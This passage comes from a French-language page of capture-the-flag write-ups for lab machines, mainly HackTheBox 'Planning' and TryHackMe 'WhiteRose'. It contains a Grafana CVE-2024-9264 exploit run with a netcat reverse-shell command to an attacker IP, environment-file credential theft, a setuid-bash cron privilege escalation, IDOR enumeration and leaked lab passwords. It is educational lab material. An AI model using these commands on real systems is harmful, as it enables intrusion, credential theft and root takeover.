[+] Reading file: /home/grafana/pass.txt
[-] File not found
```
```bash
python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c "nc -e /bin/sh 10.10.15.17 4444" http://grafana.planning.htb
```
```bash
$ python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -f /proc/1/environ http://grafana.planning.htb
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Reading file: /proc/1/environ
[+] Successfully ran duckdb query:
[+] SELECT content FROM read_blob('/proc/1/environ'):
```
```bash
$ python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c "env" http://grafana.planning.htb
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Executing command: env
[+] Successfully ran duckdb query:
[+] SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM read_csv('env >/tmp/grafana_cmd_output 2>&1 |'):
[+] Successfully ran duckdb query:
[+] SELECT content FROM read_blob('/tmp/grafana_cmd_output'):
GF_PATHS_HOME=/usr/share/grafana
HOSTNAME=7ce659d667d7
SHLVL=0
AWS_AUTH_EXTERNAL_ID=
HOME=/usr/share/grafana
AWS_AUTH_AssumeRoleEnabled=true
GF_PATHS_LOGS=/var/log/grafana
GF_PATHS_PROVISIONING=/etc/grafana/provisioning
GF_PATHS_PLUGINS=/var/lib/grafana/plugins
PATH=/usr/local/bin:/usr/share/grafana/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
AWS_AUTH_AllowedAuthProviders=default,keys,credentials
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
AWS_AUTH_SESSION_DURATION=15m
GF_SECURITY_ADMIN_USER=enzo
GF_PATHS_DATA=/var/lib/grafana
GF_PATHS_CONFIG=/etc/grafana/grafana.ini
AWS_CW_LIST_METRICS_PAGE_LIMIT=500
PWD=/usr/share/grafana
```
Création d’un environnement dans le container Docker, qui me permet d’obtenir le mot de passe du user **enzo** *RioTecRANDEntANT*
## Connexion SSH
Avec le password trouvé précédemment.
```bash
$ ssh enzo@10.10.11.68
The authenticity of host '10.10.11.68 (10.10.11.68)' can't be established.
ED25519 key fingerprint is SHA256:iDzE/TIlpufckTmVF0INRVDXUEu/k2y3KbqA/NDvRXw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.68' (ED25519) to the list of known hosts.
enzo@10.10.11.68's password:
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-59-generic x86_64)
Last login: Sun Sep 21 23:57:11 2025 from 10.10.15.17
enzo@planning:~$
```
```bash
enzo@planning:~$ netstat -tulnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:38283 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.54:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.54:53 0.0.0.0:* -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
```
Le port 8000 semble être intéressant.
```bash
enzo@planning:/$ ls
bin@ boot/ dev/ home/ lib64@ lost+found/ mnt/ proc/ run/ sbin.usr-is-merged/ sys/ usr/
bin.usr-is-merged/ cdrom/ etc/ lib@ lib.usr-is-merged/ media/ opt/ root/ sbin@ srv/ tmp/ var/
enzo@planning:/$ cd opt
enzo@planning:/opt$ ls
containerd crontabs
enzo@planning:/opt$ cd containerd
enzo@planning:/opt/containerd$ ls
ls: cannot open directory '.': Permission denied
enzo@planning:/opt/containerd$ cd ..
enzo@planning:/opt$ ls
containerd crontabs
enzo@planning:/opt$ cd crontabs
enzo@planning:/opt/crontabs$ ls
crontab.db env.db
enzo@planning:/opt/crontabs$ cat env.db
enzo@planning:/opt/crontabs$ cat crontab.db
{"name":"Grafana backup","command":"/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && /usr/bin/gzip /var/backups/grafana.tar && zip -P P4ssw0rdS0pRi0T3c /var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz","schedule":"@daily","stopped":false,"timestamp":"Fri Feb 28 2025 20:36:23 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740774983276,"saved":false,"_id":"GTI22PpoJNtRKg0W"}
{"name":"Cleanup","command":"/root/scripts/cleanup.sh","schedule":"* * * * *","stopped":false,"timestamp":"Sat Mar 01 2025 17:15:09 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740849309992,"saved":false,"_id":"gNIRXh1WIc9K7BYX"}
```
Le fichier crontab.db contenait le password ***P4ssw0rdS0pRi0T3c .***
J’ai créé un tunnel SSH pour le crontab avec les identifiants du user Enzo.
```bash
ssh -L 8000:127.0.0.1:8000 -N -f enzo@planning.htb
```
Je n’avais plus qu’à accéder au crontab UI dans le navigateur à l’adresse 127.0.0.1:8000 et me connecter avec les identifants.
```bash
root
P4ssw0rdS0pRi0T3c
```
Toujours dans l’UI crontab, j’ai ajouter un cronjob.
```bash
cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash
```
```bash
/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && /usr/bin/gzip /var/backups/grafana.tar && zip -P P4ssw0rdS0pRi0T3c /var/backups/grafana.tar.gz.zip
/var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz
```
```bash
/root/scripts/cleanup.sh
```
Déconnexion puis reconnexion afin que les changements soient pris en compte.
```bash
enzo@planning:~$ /tmp/rootbash -p
rootbash-5.2# ls
user.txt
rootbash-5.2# cat user.txt
c2eccb774042d4ac3ff83c3c66b55250
rootbash-5.2# cd root
rootbash: cd: root: No such file or directory
rootbash-5.2# cd /root
rootbash-5.2# ls
root.txt scripts
rootbash-5.2# cat root.txt
b7f38a74e151fbff1dc3a481ca59db70
rootbash-5.2# cd scripts
rootbash-5.2# ls
cleanup.sh crontab.db docker-compose.yml Dockerfile
rootbash-5.2# cleanup.sh
```
# Conclusion
Cette box était plutôt cool. J’ai pû toucher un peu aux bases de données, à Grafana.
J’ai appris à faire un tunnel SSH pour un accès via le navigateur. Ce n'était pas évident, cette partie.
</script>
</div>
</article>
<article class="writeup-item">
<h3 class="clickable"><span class="title-text">Machine Basique</span></h3>
<div class="writeup-content" aria-hidden="true">
<script type="text/markdown">
# HackTheBox - Machine Basique
... (contenu markdown) ...
</script>
</div>
</article>
</section>
<!-- TryHackMe -->
<section class="platform-section">
<h2>TryHackMe</h2>
<article class="writeup-item">
<h3 class="clickable"><span class="title-text">WhiteRose - THM - Room Easy</span></h3>
<div class="writeup-content" aria-hidden="true">
<script type="text/markdown">
# Recon
Inscription dans nano, de l'ip avec l'url.
```bash
$ sudo nano /etc/hosts
```
cyprusbank.thm
```bash
$ sudo nmap -sS -sC -sV 10.10.123.71
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-22 00:08 CET
Nmap scan report for cyprusbank.thm (10.10.123.71)
Host is up (0.031s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b9:07:96:0d:c4:b6:0c:d6:22:1a:e4:6c:8e:ac:6f:7d (RSA)
| 256 ba:ff:92:3e:0f:03:7e:da:30:ca:e3:52:8d:47:d9:6c (ECDSA)
|_ 256 5d:e4:14:39:ca:06:17:47:93:53:86:de:2b:77:09:7d (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.10 seconds
```
# Fuzzing
```bash
$ ffuf -c -w /home/french/documents/seclists/discovery/web-content/directory-list-2.3-medium.txt:FUZZ -w http://cyprusbank.thm/FUZZ
```
Pour l'instant, il n'y que ce fichier qui est sorti.
```bash
index.html
```
J'ai essayé d'autres wordlists, toujours avec Ffuf mais ça ne donnait rien. Donc j'ai essayé avec GoBuster et les wordlists utilisés avec l'outil FFuf.
```bash
$ wfuzz -c --hw 3 -w /usr/share/seclists/Discovery/dns/subdomains-top1million-110000.txt -H "Host: FUZZ.cyprusbank.thm" cyprusbank.thm
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://cyprusbank.thm/
Total requests: 114441
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 8 L 24 W 252 Ch "www"
000000024: 302 0 L 4 W 28 Ch "admin"
Total time: 400.3569
Processed Requests: 114441
Filtered Requests: 114439
Requests/sec.: 285.8474
```
```bash
Ajout de l'extension au fichier /etc/hosts
$ sudo nano /etc/hosts
<adresse IP> admin.cyprusbank.thm
```
Nous arrivons sur la page 'admin.cyprusbank.thm' et nous avons une page de connexion, les credentials fourni vont être utiles.
```bash
Olivia Cortez:olivi8
```
# Exploitation
Le site permet à un attaquant de manipuler les paramètres de l'URL. C'est à dire, qu'en changeant les valeurs depuis notre utilisateur, on peut accéder aux informations d'autres users.
Ici, on peut par exemple automatiser le processus, en créant une liste de nombres qui se suivent, avec Python.
Et utiliser Curl ou Burpsuite, afin de tester chaque paramètre de notre liste.
Dans cette machine, j'ai testé à la main, étant donné que ce n'est pas une cible du monde réelle, avec des milliers d'utilisateurs. C'est jouable.
```bash
http://admin.cyprusbank.thm/messages/?c=5
http://admin.cyprusbank.thm/messages/?c=10
```
```bash
La page 10 contient la discussion suivante:
Banque nationale de Chypre - Chat administratif
ÉQUIPE DEV : Merci Gayle, pouvez-vous partager vos informations d'identification ? Nous avons besoin d'un compte administrateur privilégié pour les tests
Gayle Bev : Bien sûr ! Mon mot de passe est 'p~]P@5!6;rs558:q'
ÉQUIPE DEV : Très bien, nous essayons d'implémenter l'historique des discussions, tout devrait être prêt dans environ une semaine.
Gayle Bev : C'est agréable à entendre !
Gayle Bev : Les développeurs ont implémenté cette nouvelle fonctionnalité de messagerie que j'avais suggérée ! Qu'en pensez-vous ?
Greger Ivayla : Ça a l'air vraiment cool !
Jemmy Laurel : Hé, vous avez vu Mme Jacobs récemment ??
Olivia Cortez : Non, elle n'est plus là depuis un moment
Jemmy Laurel : Oh, est-ce qu'elle va bien ?
```
Nous arrivons sur le compte de Gayle Bev avec le password:
```bash
p~]P@5!6;rs558:q
```
Grâce à cela, nous voyons à la première page la réponse à la première question du CTF, le numéro de Tyrell Wellick
```bash
Tyrell Wellick : $20.855.900.000 842-029-5701
```
</script>
</div>
</article>
</section>
<!-- Root-Me -->
<section class="platform-section">
<h2>Root-Me</h2>
<article class="writeup-item">
<h3 class="clickable"><span class="title-text">Challenge Forensic</span></h3>
<div class="writeup-content" aria-hidden="true">
<script type="text/markdown">
# Root-Me - Challenge Forensic
... (contenu markdown) ...
</script>
</div>
</article>
</section>